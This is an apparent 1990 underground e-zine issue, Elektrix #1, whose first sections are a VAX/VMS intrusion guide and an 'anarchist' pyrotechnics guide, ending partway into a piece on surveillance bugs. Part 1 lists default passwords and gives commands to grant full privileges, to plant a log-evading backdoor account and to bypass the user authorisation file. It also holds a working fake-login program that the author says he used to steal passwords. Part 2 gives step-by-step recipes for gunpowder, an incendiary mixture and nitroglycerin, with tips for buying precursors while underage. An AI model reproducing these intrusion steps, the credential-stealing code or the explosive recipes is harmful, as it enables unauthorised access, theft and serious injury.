|
Elektrix Magazine #1
NOTICE: TO ALL CONCERNED Certain text files and messages contained on this site deal with activities and devices which would be in violation of various Federal, State, and local laws if actually carried out or constructed. The webmasters of this site do not advocate the breaking of any law. Our text files and message bases are for informational purposes only. We recommend that you contact your local law enforcement officials before undertaking any project based upon any information obtained from this or any other web site. We do not guarantee that any of the information contained on this system is correct, workable, or factual. We are not responsible for, nor do we assume any liability for, damages resulting from the use of any information on this site.
----------------------------------------------------------------------------
| |
| The Supreme Seven [S7] proudly present... |
| |
| ELEKTRIX Issue 1 |
| |
| Released May 1990 - Issue 2 in July |
| |
| |
| HACKING * PHREAKING * ANARCHY * ELECTRONIC SURVEILLANCE AND PYROTECHNICS |
| |
| |
| You can contact us at Palm Beach BBS ++44(303)-265979 [Email to Deceptor] |
----------------------------------------------------------------------------
Disclaimer: In no event shall Palm Beach be liable to anyone for special,
collateral, incidental, or consequential damages in connection with or
arising out of the use of the information within this magazine and sole
and exclusive liability to Palm Beach, regardless of any form of action,
shall not exceed the purchase price of this magazine (which since it is
nothing means we don't owe u nowt!). Moreover, Palm Beach shall not be
liable for any claim of any kind whatsoever against the user of these text
materials by any other party. Palm Beach makes no warranty, either exp-
ressed or implied, including but not limited to any implied warranties of
merchantability and fitness for particular purpose, regarding these text
materials and makes such materials available solely on an 'as-is' basis.
Now that that's over with - PARTY!
Well now, this is the first issue of many ELEKTRIX newsletters covering
such topics as COMPUTER SECURITY, HACKING, PHREAKING, SAT DECODING, RTTY
ENCODED CRACKING, MAG.STRIP ENCRYPTION AND SUPPLIES, THE ANARCHISTS GUIDES,
PYROTECHNICS, ELECTRONIC SURVEILLANCE AND ELECTRONIC FRAUD.
In this issue there are articles on Hacking, Phreaking, Pyrotechnics,
anarchy and electronic surveillance. The newsletter is bi-monthly and so
the next issue will be out in July. You can 'pickup' a copy of ELEKTRIX at
any of these boards around the world:
HACKERNET (UK) ++44(532)-557739
PALM BEACH BB (UK) ++44(303)-265979
THE LIMELIGHT BBS (USA) 0101-203-834-0367
THE PIRATES HAVEN + THE WAREHOUSE BB (EUROPE)
If you have an article or some information which you would like to see
put to use in the next issue then you can contact us at Palm Beach BBS UK.
Please send all e-mail to Deceptor. Higher priviledges available to hackers
, phreakers, etc. You can contact S7 at these places too:
TCHH - Maxhack/Deceptor/Pop
QSD - Alex/Maxhack/Deceptor
GHOST - Mail to S7/Deceptor
? Part 1 - Hacking VMS - UAF / False Logon programs, etc. / Pling Wiz
? Part 2 - The Anarchists guide to...pyrotechnics & mischief / Deceptor
? Part 3 - An guide to modern electronic surveillance / Technic
? Part 4 - Make your own tonepad for phone box phreaking / Maxhack
? Part 5 - Freefone interrogation.....The ultimate in lists. / Agent 7
---------------------- ELEKTRIX ISSUE 1: MAY 1990 ---------------------------
----------------------------------------------------------------------------
| |
| ELEKTRIX Issue 1 - Part 1 |
| ~~~~~~~~~~~~~~~~~~~~~~~~~ |
| |
| Hacking VAX/VMS + The User Authorisation File |
| By Pling Wiz |
| |
| PALM BEACH BBS UK ++44(303)-265979 |
| |
----------------------------------------------------------------------------
INTRODUCTION
The VAX is made by DEC (Digital Equipment Corp) and can run a variety
of operating systems. In this file i will talk about the VMS (Virtual
Memory Operating System), VMS also runs on the PDP-11, both mainframes
are 32 bit machines with 32 bit virtual address space.
ENTRANCE:
When you first connect to a VAX you type either a return, a ctrl-c or
a ctrl-y. It will then respond with something similar to this:
USERNAME:
PASSWORD:
The most frequent way of gaining access to a computer is by using a
'default' password, this by the way is not very successful.......
When DEC sells a VAX/VMS, the system comes equipped with 4 accounts
which are:
DEFAULT : This serves as a template in creating user records in the
UAF (User Authorization File). A new user record is assigned
the values of the default record except where the system
manager changes those values. The default record can be
modified but can not be deleted from the UAF.....
SYSTEM : Provides a means for the system manager to log in with full
privileges. The SYSTEM record can be modified but cannot be
deleted from the UAF.......
FIELD : Permits DIGITAL field service personnel to check out a new
system. The FIELD record can be deleted once the system is
installed.
SYSTEST: Provides an appropriate environment for running the User
Environment Test Package (UETP). The SYSTEST record can be
deleted once the system is installed.
Usually the SYSTEM MANAGER adds,deletes, and modifies these records
which are in the UAF when the system arrives, thus eliminating the
default passwords, but this is not always the case.....
some default passwords which have been used to get in a system are....
USERNAME PASSWORD
SYSTEM MANAGER or OPERATOR
FIELD SERVICE or TEST
DEFAULT USER or DEFAULT
SYSTEST UETP or SYSTEST
Other typical VMS accounts are :
VAX
VMS
DCL
DEMO
GUEST
GENERAL
TEST
HELP
GAMES
DECNET
Or a combination of the various usernames and passwords. If none of
these get you in , then you should try another system unless you have
away of getting an account either by trashing or other means.....
YOUR IN!!!!!!
You will know that you are in by receiving the prompt of a dollar sign
($). You will be popped into the default directory which is dependent
on what account you logged in as. If you get in as system manager
(highly unlikely) you have full access....
If you get the FIELD or SYSTEST account , you may or may not have full
access, but you may have the privileges to give your self full access.
To give privs to yourself:
$ SET PROCESS/PRIVS=ALL
The VMS system has full help files available by typing HELP. You can
use the wildcard character of an '*' to list out info on every
command:
$ help *
When you first logon, it may be to your advantage to get a list of all
users currently logged onto the system if there are any at all. You
can do this by:
$ SHOW USERS
VAX/VMS Interactive Users-Total=4
01-may-1989 11:37:21.73
0PAO: DEMO 004C004C
TTD2: FIELD 004E02FF
TTD1: SYSMAN 0043552E
TXB3 TRTRTRRTR 01190057
It is highly recommended that if you are logged on in the day and
there are people logged in, especially the system manager or the
account you are logged on as appears twice.. log out straight away,
and call back later. You do not want to call to late though as the
system keeps a record of when each user logs in and out.
To communicate with other users or other hackers that are on the
system, use the PHONE utility..
$ PHONE Username
If the system has DEC-NET you can see what available nodes there are
by :
$ SHOW NETWORK
If you have mail the system will tell you as soon as you logon, simply
type:
$ MAIL
This will invoke the Personal Mail Utility, you can then either read
your mail or select help....
DIRECTORIES:
To see what you have in your directory type:
$ DIR
To get a list of directories on the system type:
$ DIR *.*
When a VAX/VMS is first installed, it comes with 9 directories which
are not listed when you execute the DIR *.* command:
<SYSLIB>
This directory contains various macro and object libraries.
<SYSMSG>
This directory contains files used in managing the operating system.
<SYSMGR>
This directory contains text files and help libraries for the HELP
library.
<SYSERR>
This is the directory for the error log file (ERRLOG.SYS).
<SYSTEST>
This directory contains files used in testing the functions of the
operating system.
<SYSMAINT>
This directory contains system diagnostic programs.
<SYSUPD>
This directory contains filesused in applying system updates.
<SYSUPD.EXAMPLES>
This directory contains sample driver programs, user-written system
services, and other source programs.
<SYSEXE>
This directory contains the executable images of most of the functions
of the operating system.
Inside these directoriesare files with the following file types:
File-Type: Description: command:
--------------------------------------------------------------------
.hlp system help file TYPE filename
.dat data file TYPE filename
.msg message file TYPE filename
.doc Documentation TYPE filename
.log LOG file TYPE filename
.err ERROR msg file TYPE filename
.seq sequential file TYPE filename
.sys system file FILE-NAME
.exe executable file FILE-NAME
.com command file COMMAND NAME
.bas basic file RUN file-name
.txt ascii text file TYPE filename
--------------------------------------------------------------------
There are others but you won't see them as much as the above. You can
change the directories either by using the CHANGE command or by using
the SET DEFAULT command:
$ CHANGE <DIR.NAM>
or
$ SET DEFAULT <DIR.NAM>
You can now list and execute the files in this directory without first
the directory name followed by the filename as long as you have
sufficient access. If you don't have sufficient access you can still
view files within directories that you cannot default to by:
$ TYPE <LOD.DIR> LOD.MAI;1
This will list the contents of the file LOD.MAI;1 in the directory of
<LOD.DIR>
The use of wildcards is very helpful when you desire to view all the
mail or something on the system. To list out all the users mail if you
have access type:
$TYPE <*.*>*.MAI;*
As you may have noticed mail files have the extension of MAI at the
end. The ;1 or ;2 etc are used to number files with the same name.
PRIVILEGES
Privileges fall into 7 categories according to the damage that the
user possessing them could cause to the system:
NONE - No privileges
NORMAL - minimum privileges to use the system.
GROUP - Potential to interfere with members of the same group.
DEVOUR - Potential to devour noncritical system-wide resources.
SYSTEM - Potential to interfere with normal system operation.
FILE - Potential to comprimise file security.
ALL - Potential to control the system (wouldn't that be good ahah).
THE UAF
The User Authorization File contains the names of the users who may
log into the system and also contains a record of the users
privileges. Each record in the UAF includes the following:
1. Name and Password.
2. User Identification Code(UIC)-- Identifies a user by a group number
and a member number.
3. Default file specification --- Has the default device and directory
names for file access.
4. Login command file --- Names a command procedure to be executed
automatically at login time.
5. Login flags --- Allows the system manager to inhibit the user of
the ctrl-y functions and lock user passwords.
6. Priority ---- Specifies the base priority of the process created
by the user at login time.
7. Resources --- Limits the system resources the user may perform.
8. Privileges --- Limits the activities the user may perform.
If you have SYSTEM MANAGER privileges, you will be able to add,delete,
and modify records in the UAF.
The AUTHORIZE Utility allows you to modify the information in the UAF.
It is usually found in the SYSEXE directory.
The commands for AUTHORIZE are:
ADD Username <qualifier..> Adds a record to the UAF.
EXIT (or CTRL-Z) Returns you to command level.
HELP Lists the AUTHORIZE commands.
LIST <Userspec></FULL> Creates a listing file of UAF records.
MODIFY Username Modifies a record.
REMOVE Username deletes a record.
SHOW Displays UAF records.
The most useful besides ADD is the SHOW command. SHOW displays reports
for selected UAF records. YOU can get a /BRIEF listing of a /FULL
listing. BUT before you do that, you may want to make sure no one is
logged on besides you,to make sure know one can log on type the
following:
$ SET LOGINS /INTERACTIVE=0
This establishes the max number of users able to log in to the system,
this command does not affect users currently logged on.
To list out the userfile do the following:
$ SET DEFAULT <SYSEXE>
$ RUN AUTHORIZE
UAF> SHOW * /BRIEF
UAF
Unfortunately you cannot get a listing of passwords,though you can get
a listing of all the users as shown above... The passwords are
encrypted just like the unix systems.
If you have sufficient privs you can create your own account.........
UAF> ADD <Username> /PASSWORD=HACKER /UIC=<014,006> /CPUTIME=0
/DEVICE=SYS$ROOT_/ACCOUNT=VMS /DIRECTORY=<SYSERR> /PRIVS=ALL
/OWNER=DIGITAL /NOACCOUNTING
1. ADD USERNAME
2. SPECIFY THE PASSWORD YOU WANT TO USE....
3. ASSIGN A UIC CONSISTS OF 2 NUMBERS FROM 0 TO 377 SEPERATED BY A
COMMAND ENCLOSED IN BRACKETS....
4. CPUTIME IS IN DELTA FORMAT, 0 MEANS INFINITE......
5. SPECIFY THE DEVICE THAT IS ALLOCATED TO THE USER WHEN THEY LOGIN.
OTHER DEVICES ARE SYS$DEVICE,SYS$SYSDISK ETC..
6. SPECIFYING AN ACCOUNT IS NOT REALLY NECCESSARY
7. PRIVS YOU ARE GOING TO WANT ALL THE PRIVS AREN'T YOU???
8. VERY IMPORTANT.... NOACCOUNTING WILL DISABLE THE SYSTEM ACCOUNTING
RECORDS,THUS NOT ADDING INFORMATION TO THE ACCOUNTING.DAT FILE.
LOGGING OFF
Simply type:
$ LOGOUT
BYPASSING THE UAF...
=====================
The preferred method of breaking into a locked system is to set the alternat
UAF. This method requires setting the system parameter UAFALTERNATE, which
defines the logical name SYSUAF to refer to the file SYS$SYSTEM:SYSUAFALT.DA
If this file is found during a normal login, the system uses it to validate
the account and prompts you for the username and password.
If this file is not located, the system assumes that the UAF is corrupt and
accepts any username and password to log you into the system from the system
console. Logins are prohibited from all other locations.
NOTE: You can only use this method to log into the system from the console
terminal; you cannot use the other terminal lines.
To set the alternate UAF ,use the following procedure:
1: Perform a conversational boot..
2: When the SYSBOOT > prompt appears, enter the following
SYSBOOT > SET UAFALTERNATE 1 <cr>
3: Type CONTINUE and press <cr>
4: When the start up procedure completes, log in on the console terminal by
entering any username and password when asked to..
The system assigns the following values to your user account:
NAME.................. Username.
UIC................... [001,004].
COMMAND INTERPRETER... DCL.
LOGIN FLAGS........... None.
PRIORITY.............. Value of system parameter (DEFPRI).
RESOURCES............. Value of the PQL system parameters.
PRIVILEGES............ ALL.
The process name is usually the name of the device on which you logged in
EG opa0..
5: Fix the problem that caused you to be locked out of the system. That is,
make the necessary repairs to the UAF or to the start up or login
procedures . (If you modify a login or startup procedure and the problem
is still not solved, restore procedure to its previous state.
If the problem is a forgotten password, reset the UAFALTERNATE system param
to 0, as explained in the next step. Then enter the authorize utility and
then type HELP MODIFY for info on modifying passwords...
6: Clear the UAFALTERNATE parameter by running SYSGEN and using SYSGEN
commands. To run SYSGEN, enter the following commands at the DCL prompt:
$ RUN SYS$SYSTEM:SYSGEN <CR>
The SYSGEN prompt is then displayed, then enter the following commands:
SYSGEN > SET UAFALTERNATE 0 <CR>
SYSGEN > WRITE CURRENT <CR>
SYSGEN > EXIT <CR>
7: Shutdown and reboot the system.
Emergency startup after modifying system paramaters.
In some cases, modifying system parameters may cause the system to become
unbootable. If this occurs, use the following emergency startup procedure
to restore normal operation.....
1: Perform a conversational boot....
2: When the SYSBOOT > prompt appears enter the following commands:
SYSBOOT > USE DEFAULT.PAR <CR>
SYSBOOT > CONTINUE <CR>
3: When the system finishes booting, review any changes you made to SYSGEN
parameters, modify MODPARAMS.DAT as necessary and re execute AUTOGEN.
BYPASSING STARTUP AND LOGIN
===========================
If the system does not complete the startup procedures or does not allow you
to log in , bypass the startup and login procedures by following these steps
1: Perform a conversational boot..
2: define the console to be the startup procedure by entering the following
commands at the SYSBOOT > prompt:
SYSBOOT > SET/STARTUP OPA0:
Type continue and press <CR> in response to the next SYSBOOT > prompt.
Wait for the DCL prompt to return.....
3: Correct the error condition that caused the login failure. That is, make
the necessary repairs to the startup or login procedures, or to the UAF.
You may want to enter the following DCL commands because bypassing the
startup procedures leaves the system in a partially initialized state:
$ SET NOON <CR>
$ SET DEFAULT SYS$SYSROOT:[SYSEXE] <CR>
Invoke a text editor to correct the startup or login procedure file. Note
that some system consoles may not supply a screen mode editor.
4: Reset the startup procedure by invoking SYSGEN and entering the following
commands:
$ RUN SYS$SYSTEM:SYSGEN <CR>
SYSGEN > SET/STARTUP SYS$SYSTEM:STARTUP.COM <CR>
SYSGEN > WRITE CURRENT <CR>
SYSGEN > EXIT <CR>
5: Perform a normal startup by entering the following command:
$ @SYS$SYSTEM:STARTUP <CR>
To perform an orderly shutdown of the system, invoke SHUTDOWN.COM from
any terminal and any priveleged account with the following DCL command:
$ @SYS$SYSTEM:SHUTDOWN <CR>
EMERGENCY SHUTDOWN WITH OPCRASH
===============================
This describes how to halt the system immediately without performing any of
the functions that ensure an orderly shutdown. You use the OPCRASH procedur
only if SHUTDOWN.COM FAILS......
To perform this procedure you must have CMKRNL privilege. You can enter the
commands from ANY terminal.
1: Enter the following command to force an immediate shutdown of the system
$ RUN SYS$SYSTEM:OPCRASH <CR>
2: At the system console the following message is displayed
SYSTEM SHUTDOWN COMPLETE - USE COBSOLE TO HALT SYSTEM.
3: Halt the system
e.g. emergency shutdown using opcrash...
$ RUN SYS$SYSTEM:OPCRASH <CR>
GENERAL MAINTENANCE OF THE UAF.
===============================
To disable an account use the following command:
UAF > MODIFY USERNAME/FLAGS=DISUSER <CR>
The login flag disuser disables the account and prevents anyone from loggin
into the account.
To enable the account when it is needed, run AUTHORIZE and specify the
following command:
UAF > MODIFY USERNAME/FLAGS=NODISUSER <CR>
MODIFYING A USER ACCOUNT.
=========================
Use the AUTHORIZE command MODIFY to change any of the fields in an existing
user account. The following command is used to change a users password.
UAF> MODIFY USERNAME/PASSWORD=NEWPASSWORD <CR>
LISTING USER ACCOUNTS.
======================
Use the AUTHORIZE command LIST to create the file SYSUAF.LIS containing a
summary of all user records in the UAF, as follows:
UAF > LIST <CR>
%UAF-I-LSTMSG1, WRITING LISTING FILE
%UAF-I-LSTMSG2, LISTING FILE SYSUAF.LIS COMPLETE.
By default the LIST command produces a brief report containing the followin
info from the UAF:
ACCOUNT OWNER,USERNAME,UIC,ACCOUNTNAMES,PRIVILEGES,PROCESS PRIORITY,
DEFAULT DISK AND DIRECTORY.
Use the /FULL qualifier to create a full report of all the info contained
within the UAF.....
ENABLING SECURITY ALARMS.
=========================
To enable security auditing, specify the dcl command SET AUDIT in the
following format:
$ SET AUDIT/ALARM/ENABLE = KEYWORD [...]
Select the events to be audited by specifying one or more of the keywords
to the /ENABLE qualifier....
ACL.......... Event requested by an acl on a file or global section..
ALL.......... All possible events..
AUDIT........ Execution of the SET AUDIT command..
AUTHORIZATION modifications to the system UAF file, network proxy,
authorization file,rights database, or changes to system
and user passwords..
BREAKIN...... Successful breakin attempt..
FILE ACCESS.. Selected types of access (privileged + non privileged) to
files + global sections..
INSTALL...... Installation of images..
LOG FAILURE.. Failed login attempt..
LOGIN........ Successful login attempt..
MOUNT........ Volume mounts + dismounts..
ENABLING ALARM MESSAGES
=======================
After you enable a security operator terminal, enable specific alarm events
with the SET AUDIT/ENABLE qualifier. Alarm messages are then sent to the
security operator terminal when the selected events occur.
AUDIT REDUCTION FACILITY.
=========================
If you have enabled security alarms, the operating system writes the
information about these alarms to the security operators log file. To
extract all of the security alarm info from the current operators log file
(SYS$MANAGER:OPERATOR.LOG) execute this command:
$ @SYS$MANAGER:SECAUDIT <CR>
Output from SECAUDIT is displayed on SYS$OUTPUT. If you want to write the
records to a file, include the file spec with the /OUTPUT qualifier..
The following command writes the records to the file BREAKINS.DAT in the
user current directory..
$ @SYS$MANAGER:SECAUDIT/OUTPUT=BREAKINS.DAT
SIMPLE DECOY PROGRAM
~~~~~~~~~~~~~~~~~~~~
This is a decoy program that runs on the vax/vms system..
It does work because i have used it at the local college of FE, to steal
passwords and accounts whilst working there....
The program now follows:-
$ clear
$ set term/noecho/notype
$ SYSNAM:=(nodename)
$begin:
$ read/error=begin/prompt="" sys$command ret
$ write sys$output ""
$ID:
$ wait 00:00:00.5
$ write sys$output "*** ''SYSNAM' VAX/VMS SYSTEM ***"
$ write sys$output ""
$ write sys$output ""
$ wait 00:00:01
$ set term/echo
$ askquest:
$ read/error=fail/end=eof/prompt="USERNAME: "/time=20 sys$command quest
$ if f$edit(quest,"upcase") .eqs. "SYBIL" then SYSNAM:=SYBIL
$ if f$edit(quest,"upcase") .eqs. "SYBIL" then goto ID
$ if quest .nes. "" then goto askpass
$eof:
$ write sys$output "Error reading command input"
$ write sys$output "End of file detected"
$ goto begin
$fail:
$ write sys$output "Error reading command input"
$ write sys$output "Timeout period expired"
$ goto begin
$askpass:
$ set term/noecho
$ read/error=eof/end=eof/prompt="PASSWORD: " sys$command pass
$ set term/echo
$ open/write file data.dat
$ write file quest
$ write file pass
$ write file f$time()
$ close file
$ set term/lowercase
$ write sys$output "User authorization failure"
$ read/error=begin/prompt ="" sys$command ret
$ stop/id='f$getjpi("","PID")
Notes about use...
1... change the welcoming message of the program to what is actually seen
on your vax...
2... why not put at the top of the program the logout procedure of someone
else.. because a blank screen looks a bit suspicious...
just copy the log out statement and put it between a sys$output command
in the program .. not forgetiing to take the clear command out haha
------------------- Palm Beach BBS ++44(303)-265979 ------------------------
----------------------------------------------------------------------------
| |
| ELEKTRIX Issue 1 - Part 2 |
| ~~~~~~~~~~~~~~~~~~~~~~~~~ |
| |
| The Anarchists guide to...Pyrotechnic mischief |
| by Deceptor |
| |
| PALM BEACH BB UK ++44(303)-265979 |
| |
----------------------------------------------------------------------------
MDA - (3-4-methylendioxyphenylisopropylamine) takes u higher!
Welcome to this, Issue 1 of Elektrix, and with it Part 1 of the 'anarchists
guide to...' This first file will contain basic information on pyrotechnics
and other 'bits n pieces' useful for a good laugh.
In this file you will find information on how to make the following:
Fuse Paper
Auto-Firelighters
Low-explosive: Gunpowder
Hi-explosive : Nitro-Glycerin
Hot Stuff
FUSE PAPER
Useful for making the fuses for bangers (firecrackers) and other slow-burn
fuse applications.
You will need: Sodium Chlorate - Go to your local gardenshop/centre and ask
for some Sodium Chlorate weedkiller. You're
meant to be 18 by law but if you're not it
doesn't usually stop them selling you it.
Newspaper/Tracing Paper
The Sodium Chlorate in the weedkiller is unlikely to be more than about 65%
pure - this is not a problem if you're not worried about how quickly it will
burn as fuse paper but if you are using the fuses in a lot of wind or are
going to through them as part of a firecracker you will have to concentrate
the Sodium Chlorate and remove impurities as much as possible beforehand as
follows:
Make a saturated solution of the weedkiller (ie.dissolve as much of it
as you can in very hot water) then filter off any remaining crystals.
Then heat the solution very hot in a dish - then when crystals start
forming around the rim heat more gently and then leave to cool - after
some time u will have crystals with gunge all over them - wash them and
filter off any rubbish.
This is really simple to make but quite effective...Just take the Sodium
Chlorate (pure or weedkiller) and then make a solution of it (put in water).
Then soak the paper in the water and leave to dry on a radiator.
When the paper is dry it will burn with some loud pops and just as fusepaper
so you have made your own fuses. Now to put the fuses to work....(hehe)
GUNPOWDER
Gunpowder is great stuff - though not really as exciting as plastic or
high-explosive it can be good fun for fireworks, bangers and not so large
explosions.
You will need: Sulphur - Obtain this from your chemist. Yup! Just ask
for 'flowers of sulphur' (what a stupid name
for it!)
Carbon - Best just to use crushed charcoal for this.
Potassium - Get this from a gardenshop (ask for Saltpetre).
Nitrate Can also use Sodium Nitrate in 'Weedol weed-
killer' - but not actually as good.
Making gunpowder from this is just too easy.....Just grind each substance
until it is a fine powder....then mix them in the following ratio:
Potassium Nitrate : Sulphur : Carbon
1 : 3 : 7
Once mixed well you have made gunpowder - pack it in a confined space - add
a fuse with the FUSE PAPER as shown above and you have a 'low-explosive'. It
can be great fun. If you want to light the gunpowder with a short delay of
about twenty seconds or so without the need for matches or lighters then use
a FIRELIGHTER as shown next.
FIRELIGHTER
Not really much to this but useful for delayed firelighting with the use of
matches or lighting materials.
You will need: Glycerin - Get it from your kitchen/medicine drawer.
Potassium - This is now more commonly referred to as
Permanganate potassium (vii) manganate and can be picked
up at the chemist. If they ask you what you
want it for just say 'water-purification'.
Sugar - If you can't get this; you really are lame!
Ok. Take the stuff separately in the following proportions:
Glycerin : Potassium Permanganate : Sugar
3 : 9 : 1
Crush the sugar and the glycerin up real well (icing sugar works well) then
just pour the glycerin on top and watch - change the proportions a bit and
you can have some real fun - try putting a bit of Sulphur in! Hehehehe You
can also use this as a detonator for a low-explosives such as gunpowder as
it doesn't go out easily!!! Also if you get a lot of it and a good ratio it
can be used as a good smoke bomb for indoors since you can run off and it's
not going then a minute later there's sweet smoke * EVERYWHERE * and phuck
it doesn't set most smoke alarm detectors off!
NITROGLYCERIN
Contrary to what people may have told you:
1) It's very easy to make (if you have the fractional distillation gear).
2) It doesn't blow up when you drop it - cos homemade isn't usually pure
enough.
Ok. You will need: Sulphuric Acid - Go to a garage and ask for some battery
acid or crack open a battery (dumper
truck batteries are cool - can give 400
amps current output!!! Whew!) You can
sometimes get it at harbours.
Sodium Nitrate - Weedkiller - this time get the 'WEEDOL'
one with Sodium Nitrate in it or any one
with Sodium Nitrate.
Glycerin - From kitchen as before.
Now the thing with this is that in order to actually MAKE nitroglycerin you
will need Conc.Nitric acid and Conc.sulphuric as well as the glycerin. The
sulphuric is easy to do - battery acid is roughly 69% pure - the rest being
water. The best way to get conc. sulphuric therefore is to heat the acid to
* VERY * hot (400 degrees plus) and then leave it for a long time until its
acidity increases a great deal (like well nasty!). Get a litre of Sulphuric
acid concentrated and store it in a glass bottle. [Wash yer hands too - its
not nice stuff].
Now getting the Nitric acid in any form is well difficult unless you have
access to it at college/work etc. The best way I've found is to take Sodium
Nitrate weedkiller and do the following:
1) Purify the Sodium Nitrate from the weedkiller by making a saturated soln.
and then crystallizing it and washing the crystals and filter off any
nasties...Now you have Sodium Nitrate (reasonably pure).
2) Then take the Sodium Nitrate crystals and crush them into a powder or as
close as you can get.
3) Now you want to sort of extract the nitrate - for this you will need fair
distillation equipment. You are attempting to make Nitric Acid from the
Sodium Nitrate by reacting it with some of the Sulpluric acid which was
concentrated from before.
i) Pour Sulphuric acid in here
||
|D2|___ D5 <- Nasty gases will be coming out of
Put the | _ \ ______ || here - Nitrogen Dioxide (toxic!!!)
Sodium | / \ \D3 | ___ \ ||
Nitrate | | \ \___| | _| |_||_
crystals | | \------| | | | || | <----- Clear container with Nitrogen
in here /D1\ /\ |-| |----| Dixode bubbling through the
----> \__/ || |___D4___| water to turn it to Nitric Acid
HEAT ||
That is a cooling bracket (yeh I know it looks nothing like one but thats
life with TXT files!)...I hope that solves confusion over the following
instructions...Bet it doesn't! hah
ii) Right assemble the distillation/fractional distillation equipment or
homemade equipment if that's what you've done as shown above.
iii) Put the Sodium Nitrate crystals in the flat bottomed flask (D1) and
you may want to put some anti-bumping granules in too (tiny bits of
glass).
iv) Don't connect D4 or D5 at this time - just a bowl to get any crap that
comes off early.
v) Start pouring in the Sulphuric Acid(D2) and keep the mixture hot so the
reaction is real good. When it gets to around 79 degrees (I think) or
so then a red sort of mist comes about inside the equipment - don't
run like phuck away but be worried all the same since you have to move
fast now.....Connect D4 and D5 and make sure you don't breathe in any
of the red smoke (Nitrogen Dioxide) [If you wanna intoxicate yerself
then read my third Anarchists guide on....chemical weapons (dioxins)].
(It's probably best to make sure you don't breathe the crap in by add-
ing a second D4 thing on the end of D5 to filter off as much vapour as
possible).
vi) Once that's all over then you will have a nice concentrated nitric acid
in D4.....
[BTW - Remember to keep the cooling bracket D3 real cool with fresh cool run
ning water - or you won't get much at all].
NOTE: IT'S BEST TO STORE NITRIC ACID WHEN CONCENTRATED IN STEEL CONTAINERS
WHICH CAN RESIST THE CORROSIVE ACTION....USE GLOVES AT ALL TIMES...
4) Ok so now you have Sulphuric acid conc., Nitric acid conc. and glycerin.
Now for the difficult bit! (Haha You thought the worst was over)
5) Right this is a *** VERY *** dangerous bit.........
DON'T DO IT INDOORS...OR IN THE GARAGE - DO IT IN AN ISOLATED FIELD NEAR
YER HOUSE...IF YOU DON'T HAVE ONE THEN USE YER NEIGHBOURS GARDEN...
Get a wooden tray or box and fill it with ICE....make sure there's always
ice to stack it up - it * MUST * remain cool. Then get a conical flask
(phuck a round-bottomed one)...and a thermometer measuring up to 100 C.
Balance the flask carefully and securely in the ice bath and put the
thermometer in.
Get the Sulphuric, Nitric and glycerin in the following proportions:
Glycerin : Conc.Nitric : Conc.Sulphuric
3 : 1 1
I recommend using 1/2 litre quantities of both acids for the first batch.
6) WARNING: You are using conc.acids - they do not like water - they will
blow you up if you mistreat them by feeding them water - Make sure all
parts inside the equipment are PHUCKING dry.
Put the nitric acid into the flask and then * VERY * slowly pour in the
sulphuric acid whilst watching the temperature....(use a dropper).
MAKE SURE: If the temperature ever goes about 30 degrees C then pour the
contents of the flask into the ice bath and run like ****** PHUCK ******
As the temperature rises add the glycerin with a pipette (dropper) and
don't pour on any more until the temperature drops and is stable.
7) Repeat this until all the ingredients are gone......
8) Take the jar (very carefully - it's never blown up on me - but there's
a first for everything!) with the mixture of acids in it and look at the
bottom - there will be a layer that isn't quite colourless.....This is
the stuff you want. [^^^^^ At the bottom]
9) Carefully take off the top acid layer with a dropper/pipette or whatever
and store it for later use.
10) When you get near to the bottom layer (ie. Nitroglyerin) then carefully
pour on water to wash away the acids. Then let it settle again - repeat
this until you are satisfied that the acids are as gone as you can get
them - four or five times.
11) Now collect the nitroglycerin in a dry jar or something and carry it back
to your fridge in the ice bath (***** VERY CAREFULLY *****).
12) Now keep your nitroglycerin nice and cold (so it doesn't blow up your
house when you're watching TV or on your computer).
You can store Nitroglycerin in Kieselguhr (a type of clay) - then it's
easier to handle and store - add a fuse and you have dynamite.
You have now made nitroglycerin - now what to do with it?......
USE OF NITROGLYCERIN
Nitroglycerin is ofcourse a VERY high explosive. Not as high as good old
tri-nitro-toluene (TNT) but you'd find it real hard to make TNT - since
it most CERTAINLY can't be made with ordinary Sulphuric Acid.....you DO
need fuming sulphuric acid (a totally different substance).
So what to do with it?
Well if you want to blow it up you're unlikely to do it without using a
lighted fuse/detonator......it needs quite a kick to start itself off. You
can use gunpowder if you pack in into a tight space (see earlier) but the
best detonation cap I've come across is Mercury (ii) Fulminate - see Part3
of 'The Anarchists guide to...' for information on this and other kinds of
detonators. But saying that gunpowder still works well.....
An idea (never tried it but worth a go):
Try putting this lot in a jar with a fuse hanging out........
____
------------| | | -------- Nitroglycerin (not to scale)
Fuse |__|_|
(made with
fuse paper) |
|
|
Gunpowder (used as detonation cap)
DO THIS IN A VERY ISOLATED PLACE.......LIKE AN ISLAND OR A FOREST....SINCE
THE EXPLOSION IS * VERY * LOUD AND * VERY * WIDESPREAD.
*** YOU ONLY NEED A FEW DROPS TO MAKE A DECENT EXPLOSION!!!!!! ***
If you want to know about more stuff to use your Nitroglycerin for then you
can contact me on Palm Beach BBS +44(303)-265979 as Deceptor.
HOT STUFF
Don't really know what to call this other than 'HOT STUFF' - it gets bloody
hot and it eats away at Aluminium in seconds (well almost! heh).
1) Just go to the supermarket and buy some 'DRAINO' or stuff for unblocking
drains.
2) Make sure it's the powder one and take out all the bits of metal. Then
mix the leftover powder with water to make a hot and steaming liquid.
The mixture will then eat at aluminium, etc and really nicely - It doesn't
like bicycles....they tend to disappear after a while.
That's it for this Issue of Elektrix.....Stay in tune for Laser Weaponry....
Detonators.....Rocket Launchers......Grenades......and more in the next!
TO JOIN THE ANARCHISTS UNDERGROUND MAIL ME AT PALM BEACH
ONLY COMPETENT ANARCHISTS NEED APPLY (DECEPTOR)
-------------------- Palm Beach BBS ++44(303)-265979 -----------------------
----------------------------------------------------------------------------
| |
| ELEKTRIX Issue 1 - Part 3 |
| ~~~~~~~~~~~~~~~~~~~~~~~~~ |
| |
| A discussion of Electronic Surveillance techniques |
| by The Technic |
| |
| PALM BEACH BBS UK ++44(303)-265979 |
| |
----------------------------------------------------------------------------
Electronic Surviellance
Who'd bug me? I hear you ask what for, well just remember that with teh
introduction of EPSS in teh sattes and System X over here every call has a log
and that log contains who you called, where it was from and how long. In a rec
article in the Guardian it pointed out that BT and the police kept 40 people
"Under Surviellance" for 9 months before actaully arresting them for telephone
fraud. Still think no-one wants to bug you?, well later on there are some hand
tips to detect thses bugs but first you need to know what they are:
Body Mics.
These are just mics which are concealed on the body, then hooked up to a
transmitter or a recorder. These range from flat microphones taped to the skin
or tieclips, cufflinks, wrist watches whatever you need.
Condenser mics need their own power as they modify the power in accordance wit
the sound so results in thicker leads.
Range: Small and can pick up a lot of background noise
Conditions: Close contact, quiet - good for conversations etc.
Cost: Relatively cheap.
